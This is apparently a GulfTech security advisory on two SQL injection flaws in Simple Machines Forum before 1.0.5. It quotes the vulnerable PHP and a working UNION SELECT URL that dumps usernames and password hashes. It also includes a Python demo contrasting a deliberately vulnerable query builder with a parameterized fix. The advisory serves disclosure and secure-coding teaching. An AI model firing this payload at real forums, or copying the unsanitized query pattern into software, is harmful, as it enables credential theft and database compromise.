Description:
SMF, or Simple Machines Forum as it is probably better known, is a very
popular forum system developed by members of the YaBB SE development
team. Simple Machines Forum versions prior to the recently released
1.0.5 are vulnerable to a very serious SQL Injection hole, as well as a
more obscure, harder to exploit SQL Injection hole. Both vulnerabilities
have been resolved and users should upgrade to the latest version of SMF
immediately.
SQL Injection:
The first SQL Injection I will discuss is not easily exploitable under
default conditions, but I will cover it anyway. Let's have a look at the
vulnerable code in question, from Search.php at line 543:
    elseif (!$use_cache || $numResults <= $modSettings['search_results_per_page'])
    {
        $sort = array();
        $request = db_query("
            SELECT
                t.ID_TOPIC, COUNT(m.ID_MSG) AS numMsg, MAX(m.ID_MSG) AS lastMatch,
                MIN(m.ID_MSG) AS firstMatch,
                COUNT(m.ID_MSG) AS num_matches
            FROM {$db_prefix}topics AS t
                LEFT JOIN {$db_prefix}messages AS m ON (m.ID_TOPIC = t.ID_TOPIC AND
                $searchQuery)" . (empty($userQuery) ? '
            WHERE t.ID_TOPIC IN (' . implode(', ', array_keys($matchingTopics)) . ')' : "
            WHERE $userQuery
                AND t.ID_TOPIC IN (" . implode(', ', array_keys($matchingTopics)) . ")") . "
            GROUP BY t.ID_TOPIC
            LIMIT $_REQUEST[start], $modSettings[search_results_per_page]",
            __FILE__, __LINE__);
        $tmp = array();
        while ($row = mysql_fetch_assoc($request))
$_REQUEST[start] is only used after the LIMIT keyword, but because the
query does not use ORDER BY, UNION functionality can still be used from
there. The second SQL Injection issue is far more serious and allows an
attacker to easily retrieve arbitrary data from the database. It is in
the function getTopic():
    // If you're modifying, get only those posts before the current one.
    $request = db_query("
        SELECT IFNULL(mem.realName, m.posterName) AS posterName, m.posterTime, m.body,
            m.smileysEnabled, m.ID_MSG
        FROM {$db_prefix}messages AS m
            LEFT JOIN {$db_prefix}members AS mem ON (mem.ID_MEMBER = m.ID_MEMBER)
        WHERE m.ID_TOPIC = $topic" . (isset($_REQUEST['msg']) ? "
            AND m.ID_MSG < $_REQUEST[msg]" : '') . "
        ORDER BY m.ID_MSG DESC" . ($modSettings['topicSummaryPosts'] >= 0 ? '
        LIMIT ' . (int) $modSettings['topicSummaryPosts'] : ''), __FILE__, __LINE__);
As we can see, $_REQUEST[msg] is never sanitized and is placed right in
the middle of a SELECT, making it highly exploitable.
http://smf/index.php?action=post;msg=1%20UNION%20SELECT%20memberName,0,passwd,
0,0%20FROM%20smf_members%20WHERE%201/*;topic=8.0;sesc=[VALIDSESCIDHERE]
The above example would dump the username and password of every member
in the database into the comments area when editing a post. This vuln is
very dangerous!
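As an added illustration (example code written for this page, not SMF's own), the script below rebuilds the getTopic() query two ways against a constructed SQLite database: once interpolating the msg parameter exactly as the vulnerable code does, and once validating it as a decimal id and binding it as a query parameter. The table layout, the sample rows, and the helper names open_db, parse_id, get_topic_vulnerable and get_topic_hardened are all assumptions made for the demo, and SQLite stands in for MySQL, so the dialect differs slightly. The same parse_id check is the right treatment for the start parameter in the Search.php LIMIT clause discussed earlier.

```python
"""Vulnerable vs. hardened construction of a getTopic()-style query.

Added example, not SMF code: schema, rows and helper names are constructed
for this demonstration. SQLite is used in place of MySQL.
"""
import re
import sqlite3

# Constructed schema and rows; column names follow the advisory's query.
SCHEMA = """
CREATE TABLE smf_messages (
    ID_MSG INTEGER PRIMARY KEY, ID_TOPIC INTEGER, ID_MEMBER INTEGER,
    posterName TEXT, posterTime INTEGER, body TEXT, smileysEnabled INTEGER);
CREATE TABLE smf_members (
    ID_MEMBER INTEGER PRIMARY KEY, memberName TEXT, realName TEXT, passwd TEXT);
INSERT INTO smf_members VALUES (1, 'alice', 'Alice', 'HASH_alice');
INSERT INTO smf_members VALUES (2, 'bob',   'Bob',   'HASH_bob');
INSERT INTO smf_messages VALUES (1, 8, 1, 'alice', 1000, 'first post',    1);
INSERT INTO smf_messages VALUES (2, 8, 2, 'bob',   1001, 'reply',         1);
INSERT INTO smf_messages VALUES (3, 8, 1, 'alice', 1002, 'another reply', 1);
"""

SELECT_PREFIX = (
    "SELECT IFNULL(mem.realName, m.posterName) AS posterName, m.posterTime, m.body,"
    " m.smileysEnabled, m.ID_MSG"
    " FROM smf_messages AS m"
    " LEFT JOIN smf_members AS mem ON (mem.ID_MEMBER = m.ID_MEMBER)"
)


def open_db():
    """Return an in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_topic_vulnerable(conn, topic, msg=None, summary_posts=10):
    """The advisory's pattern: the msg request value is dropped into the SQL as-is."""
    sql = SELECT_PREFIX + f" WHERE m.ID_TOPIC = {int(topic)}"
    if msg is not None:
        sql += f" AND m.ID_MSG < {msg}"   # untrusted input, no sanitizing at all
    sql += " ORDER BY m.ID_MSG DESC"
    if summary_posts >= 0:
        sql += f" LIMIT {int(summary_posts)}"
    return conn.execute(sql).fetchall()


def parse_id(value):
    """Accept only a short decimal string as a row id; anything else is rejected.

    An (int) cast would silently turn '1 UNION ...' into 1, which also closes
    the hole, but rejecting the value makes the attempt visible to logging.
    """
    s = str(value)
    if not re.fullmatch(r"[0-9]{1,10}", s):
        raise ValueError(f"invalid id parameter: {s!r}")
    return int(s)


def get_topic_hardened(conn, topic, msg=None, summary_posts=10):
    """Same query, but every request value is validated and bound as a parameter."""
    params = [parse_id(topic)]
    sql = SELECT_PREFIX + " WHERE m.ID_TOPIC = ?"
    if msg is not None:
        sql += " AND m.ID_MSG < ?"
        params.append(parse_id(msg))
    sql += " ORDER BY m.ID_MSG DESC"
    if summary_posts >= 0:
        sql += " LIMIT ?"
        params.append(int(summary_posts))
    return conn.execute(sql, params).fetchall()


# The advisory's msg value, URL-decoded, reused only to contrast the two builders.
ADVISORY_MSG_PAYLOAD = "1 UNION SELECT memberName,0,passwd,0,0 FROM smf_members WHERE 1/*"


def demo():
    """Return (rows leaked by the vulnerable builder, whether the hardened one refused)."""
    conn = open_db()
    leaked = get_topic_vulnerable(conn, 8, ADVISORY_MSG_PAYLOAD)
    try:
        get_topic_hardened(conn, 8, ADVISORY_MSG_PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked_rows, was_blocked = demo()
    print("vulnerable builder returned:", leaked_rows)
    print("hardened builder rejected the payload:", was_blocked)
```

Running the script shows the vulnerable builder returning member names and passwd values in the posterName and body columns, which is exactly what ends up rendered in the edit form in the advisory's scenario, while the hardened builder raises before any SQL is executed. Binding the value as a parameter is what makes the fix robust; the regex check on top of it gives the application a clear place to log and reject malformed ids.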
Solution:
The SMF guys were very prompt in both their response and their release
of a patched version. All users should upgrade now!
Credits:
James Bercegay of the GulfTech Security Research Team